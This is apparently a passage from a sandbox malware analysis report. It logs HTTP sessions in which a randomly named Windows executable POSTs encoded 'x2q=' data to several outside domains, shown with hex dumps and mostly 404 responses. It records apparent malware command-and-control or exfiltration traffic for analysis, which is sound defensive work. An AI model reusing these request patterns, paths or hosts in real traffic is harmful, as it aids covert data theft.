                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jalan2.online/ykgd/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 77 71 6a 67 78 4b 2f 33 71 4d 73 4f 73 50 32 75 57 70 77 68 64 6e 2f 6d 51 4d 4d 35 63 50 35 50 56 62 53 44 2b 6f 53 56 43 4f 70 45 6d 62 5a 51 4e 38 73 7a 55 69 6f 6c 6b 2b 73 64 36 58 6d 4a 2b 73 35 38 69 39 47 74 37 4a 6c 57 77 47 6e 6a 66 6e 45 4f 78 50 6e 42 54 74 6e 6c 39 31 74 51 72 74 6f 45 50 6d 72 36 73 42 59 57 50 6f 53 78 6a 62 78 36 6e 57 62 30 64 32 74 48 35 4a 54 49 4d 70 6a 69 39 72 66 33 70 79 33 6f 74 76 58 73 46 6c 62 67 71 30 50 33 53 53 30 47 62 56 32 38 76 74 42 61 43 56 6a 65 43 42 4d 74 54 4a 37 66 77 69 61 4a 52 72 79 75 7a 49 31 6c 75 4c 30 73 2f 6d 6e 54 41 57 6e 35 4d 6a 75 58 4a 76 4c 41 4b 68 45 4c 57 39 41 77 55 51 2f 4e 2f 64 77 61 66 52 33 37 74 2b 56 34 46 49 44 63 59 49 41 6e 6a 50 31 4d 31 66 66 4d 37 37 63 6a 33 66 51 55 36 51 46 35 6e 5a 5a 55 53 34 65 72 6c 6a 75 53 69 74 4c 59 54 42 64 42 70 35 58 56 45 6c 55 73 4e 79 61 54 35 74 43 75 4c 36 6a 54 63 37 76 52 4a 57 78 34 4c 79 5a 78 78 4c 63 6c 75 48 52 70 78 66 65 61 55 59 76 64 78 56 6b 61 36 6e [TRUNCATED]
                                                                      Data Ascii: x2q=wqjgxK/3qMsOsP2uWpwhdn/mQMM5cP5PVbSD+oSVCOpEmbZQN8szUiolk+sd6XmJ+s58i9Gt7JlWwGnjfnEOxPnBTtnl91tQrtoEPmr6sBYWPoSxjbx6nWb0d2tH5JTIMpji9rf3py3otvXsFlbgq0P3SS0GbV28vtBaCVjeCBMtTJ7fwiaJRryuzI1luL0s/mnTAWn5MjuXJvLAKhELW9AwUQ/N/dwafR37t+V4FIDcYIAnjP1M1ffM77cj3fQU6QF5nZZUS4erljuSitLYTBdBp5XVElUsNyaT5tCuL6jTc7vRJWx4LyZxxLcluHRpxfeaUYvdxVka6nujWhMpqYqPHUb9EsIyTFL4nnU8oJbpBeJfPm4x2/JvcuAMrlNJBJtEqQnv79SB7B+VURxmrUaus27vfmj70cIq4bSzBZtHFCDXSj6HtU5VM8D5er6ONESC84pYp6rGUJh/8HPJZhZZ3vpV131CX77FR2CVCvY8X+goG5MbNSkHTrFLoHriGJXo60S+OdAY62d+3XCzs0eqL4uYLw54oP6PfCSNCQCT9NiJTtcjCr/GfRmVvLE5ax5gpFVzvDd6sLzyo7NvHd0B6G4Eim5l6dQXXg1IAMYzVUPSUXSSq7bylKwn2h4sBncvhPYGeKNi8cTaDe98ALGMNDz3MeNOSta2nlGm7FnOG/aIDAd52XfrbbClBGtXpt+RxzqyEOLMHFGO+uCuzBGgpeCe14gIhAM089uuMpt6Q89cBixgvqn4f1zzbwbTEk4qXMIahomeYhNco6wpKKL7rhT7f8cbxJSCFZX1TtWZTTaD2Z8h100jBLxpJtLpL/1LsZagIsdtBvh+r/IW9pGoZa9arh/0vdyCZud+QnkqlQ1tceGm9UUbQYZ57sgbz3bScHXwDMotkBIVqSUEQNaFeqdBACYS2rJ4Nsodiqq4ZXtbeNfFR5gZwMeI8Gl6hJUFzMLzWOuaxiI5f4H3m0oko3s6pVOXrc02quI96Z0AnKWm [TRUNCATED]
                                                                      Dec 10, 2024 15:17:29.923934937 CET279INHTTP/1.1 404 Not Found
                                                                      content-type: text/html
                                                                      cache-control: private, no-cache, max-age=0
                                                                      pragma: no-cache
                                                                      date: Tue, 10 Dec 2024 14:17:29 GMT
                                                                      server: LiteSpeed
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      transfer-encoding: chunked
                                                                      connection: close
                                                                      Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                                      Data Ascii: a
                                                                      Dec 10, 2024 15:17:29.924335003 CET713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                                      Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      32192.168.2.1149744108.181.189.7805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:31.354883909 CET359OUTGET /ykgd/?x2q=9oLAy+SEg8JXgI2TBYJ+cgbVH4pSJ447WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/h7/Kfsz1ox4b0pkaI3y+ymEAIYvakOAEmGE=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.jalan2.online
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:17:32.559376955 CET1236INHTTP/1.1 404 Not Found
                                                                      content-type: text/html
                                                                      cache-control: private, no-cache, max-age=0
                                                                      pragma: no-cache
                                                                      content-length: 1249
                                                                      date: Tue, 10 Dec 2024 14:17:32 GMT
                                                                      server: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
                                                                      Dec 10, 2024 15:17:32.559417963 CET224INData Raw: 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c
                                                                      Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      33192.168.2.1149745209.74.77.107805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:38.277431965 CET638OUTPOST /fbpt/ HTTP/1.1
                                                                      Host: www.beyondfitness.live
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.beyondfitness.live
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.beyondfitness.live/fbpt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 68 46 34 32 56 53 39 4f 45 71 76 58 33 6a 75 6c 45 6c 62 78 6b 45 38 30 4d 62 64 76 4c 42 65 79 4b 30 6a 75 4e 38 72 30 54 76 36 75 6e 34 75 58 68 53 4f 53 69 39 6d 5a 5a 38 62 62 4f 61 6a 32 42 75 38 61 4d 4f 56 78 58 46 56 4b 58 58 55 34 4e 6e 2b 68 35 6b 73 68 76 6f 33 66 71 70 56 4c 43 6e 31 68 75 6f 55 50 34 58 79 4a 53 77 65 75 6e 4a 34 45 43 34 55 57 69 5a 75 35 56 70 78 4d 34 6a 6f 4c 66 6f 7a 46 4b 30 67 4f 38 6c 70 58 31 42 37 49 7a 70 4e 77 2f 66 64 6e 35 2f 48 32 68 4b 4e 54 38 2b 48 58 38 34 77 36 61 36 75 46 31 47 5a 31 6b 77 75 31 46 47 30 39 72 59 71 68 64 41 3d 3d
                                                                      Data Ascii: x2q=hF42VS9OEqvX3julElbxkE80MbdvLBeyK0juN8r0Tv6un4uXhSOSi9mZZ8bbOaj2Bu8aMOVxXFVKXXU4Nn+h5kshvo3fqpVLCn1huoUP4XyJSweunJ4EC4UWiZu5VpxM4joLfozFK0gO8lpX1B7IzpNw/fdn5/H2hKNT8+HX84w6a6uF1GZ1kwu1FG09rYqhdA==
                                                                      Dec 10, 2024 15:17:39.482867956 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:39 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      34192.168.2.1149746209.74.77.107805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:40.950670958 CET658OUTPOST /fbpt/ HTTP/1.1
                                                                      Host: www.beyondfitness.live
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.beyondfitness.live
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.beyondfitness.live/fbpt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 68 46 34 32 56 53 39 4f 45 71 76 58 33 43 2b 6c 49 6a 54 78 73 45 38 7a 4a 62 64 76 43 68 65 32 4b 30 76 75 4e 2b 48 64 54 64 4f 75 6e 59 2b 58 67 54 4f 53 6c 39 6d 5a 57 63 62 61 4b 61 6a 44 42 75 77 53 4d 4c 39 78 58 45 78 4b 58 56 38 34 4f 51 4b 75 72 6b 73 6a 6a 49 33 52 31 35 56 4c 43 6e 31 68 75 6f 41 68 34 58 71 4a 53 42 75 75 6c 6f 34 48 4c 59 55 58 31 70 75 35 47 35 78 49 34 6a 70 75 66 72 33 76 4b 32 49 4f 38 6b 5a 58 77 41 37 58 36 70 4e 36 79 2f 63 33 39 75 79 75 69 71 38 4a 79 38 54 66 72 37 73 6d 53 63 6a 66 6c 6c 51 69 6e 6a 6d 33 52 67 56 4e 69 70 50 6f 47 47 68 75 73 32 72 74 66 45 32 6e 58 4a 61 46 54 53 35 4e 64 43 38 3d
                                                                      Data Ascii: x2q=hF42VS9OEqvX3C+lIjTxsE8zJbdvChe2K0vuN+HdTdOunY+XgTOSl9mZWcbaKajDBuwSML9xXExKXV84OQKurksjjI3R15VLCn1huoAh4XqJSBuulo4HLYUX1pu5G5xI4jpufr3vK2IO8kZXwA7X6pN6y/c39uyuiq8Jy8Tfr7smScjfllQinjm3RgVNipPoGGhus2rtfE2nXJaFTS5NdC8=
                                                                      Dec 10, 2024 15:17:42.181890965 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:41 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      35192.168.2.1149747209.74.77.107805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:43.623826981 CET1671OUTPOST /fbpt/ HTTP/1.1
                                                                      Host: www.beyondfitness.live
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.beyondfitness.live
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.beyondfitness.live/fbpt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 68 46 34 32 56 53 39 4f 45 71 76 58 33 43 2b 6c 49 6a 54 78 73 45 38 7a 4a 62 64 76 43 68 65 32 4b 30 76 75 4e 2b 48 64 54 64 32 75 6b 75 79 58 68 77 6d 53 6b 39 6d 5a 62 38 62 68 4b 61 6a 61 42 75 6f 57 4d 4c 35 4c 58 48 5a 4b 4e 30 63 34 46 42 4b 75 78 30 73 6a 2b 59 33 63 71 70 56 65 43 6e 6c 62 75 6f 51 68 34 58 71 4a 53 43 32 75 73 5a 34 48 4e 59 55 57 69 5a 75 6c 56 70 78 77 34 6a 68 59 66 6f 62 56 4a 47 6f 4f 37 45 4a 58 33 69 44 58 6d 35 4e 30 31 2f 64 79 39 75 75 50 69 71 67 4e 79 39 33 68 72 38 41 6d 57 49 58 49 78 58 51 6e 36 53 4c 66 4b 43 52 34 74 71 48 51 4b 6c 64 55 70 54 7a 39 46 67 75 73 62 72 44 63 41 41 63 4b 65 58 30 38 67 73 35 6a 5a 36 65 41 59 49 56 57 70 6d 49 53 72 37 2b 4f 30 39 5a 50 79 4d 47 50 6c 55 67 55 68 49 58 6a 32 70 4e 49 55 6e 4a 50 47 76 38 53 59 57 4b 6a 66 2b 63 5a 4c 6e 4e 6c 36 76 58 47 70 38 78 49 54 48 6e 2f 39 6d 42 42 4d 75 47 37 31 70 6f 46 76 46 76 48 39 2f 77 32 51 58 62 2b 6a 6a 2b 54 4b 4c 65 4c 62 2b 77 62 72 79 49 67 50 70 57 32 6f 56 [TRUNCATED]
                                                                      Data Ascii: x2q=hF42VS9OEqvX3C+lIjTxsE8zJbdvChe2K0vuN+HdTd2ukuyXhwmSk9mZb8bhKajaBuoWML5LXHZKN0c4FBKux0sj+Y3cqpVeCnlbuoQh4XqJSC2usZ4HNYUWiZulVpxw4jhYfobVJGoO7EJX3iDXm5N01/dy9uuPiqgNy93hr8AmWIXIxXQn6SLfKCR4tqHQKldUpTz9FgusbrDcAAcKeX08gs5jZ6eAYIVWpmISr7+O09ZPyMGPlUgUhIXj2pNIUnJPGv8SYWKjf+cZLnNl6vXGp8xITHn/9mBBMuG71poFvFvH9/w2QXb+jj+TKLeLb+wbryIgPpW2oVMq14tkRtGGs60Ep8+cP3PStaB+9czZgqe/NZS0dH35d1ZL+nwoqAlgEBVNqoIW0NTP9eV+otfKCpDQfi2Bk0wt51jZzVuJCTnncznF9+AWGmfE2zqliEQbF5B9xe6lRRyeEBFqv3k0ZxdqqEONM8MB7EE+VpS/HSkY3SCxASNBmW3Kex5ZSW0zAirBrN7X0dkhVSANcjfdWbvahYFhGxvven3UH1EXuFqPSwdSssIzUQj73SE9AXIJGoL/3pyO4I5jJaLBDI4C0OFF75B/+1lD8q1ejXZUfI7dvrWmiXrKfVapwUCKd2tm/xQ1a975YUK/zoF8wFcElh79Tg6J8HPl+CPCZTwFyDQfVNGLBzjC7xesgtFiZhTtqe0twgf26LiWk3Vh3o4+8JTv8Xam9/fKSNewzWGHSZoYpZvzGiz98ZUaREutN6TnfdobLe1H+7570RNCZTFQ2KzUWFxMK1EHXByM/aJfA2IiZjMaCJ1Pvn61Hs/Nff22cIhs4QhnGTHePPEP+osDMH/Xd+01PkA3bURzKgQxG52Fclg0qBGNHLzVHwF/fRxzT5cj95mj+NqowhSqiOA32hSa7za0wn59qGXXfse2GzNLGzplriDC/7IMTuXMh/tqwRyo18fu/Jes7jQqnnDi3tSELrbjNK6vrIJRlozntN7u [TRUNCATED]
                                                                      Dec 10, 2024 15:17:44.840209961 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:44 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      36192.168.2.1149748209.74.77.107805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:46.289422035 CET364OUTGET /fbpt/?x2q=sHQWWiJRbY7Czg+pdBTXnWo2YpYQcCCmWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqwsClZu7js/9F2ASp2jrUizXePexmAjexZLZ0=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.beyondfitness.live
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:17:47.511436939 CET548INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:47 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      37192.168.2.114974977.68.64.45805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:53.190988064 CET635OUTPOST /dm4p/ HTTP/1.1
                                                                      Host: www.dietcoffee.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.dietcoffee.online
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.dietcoffee.online/dm4p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
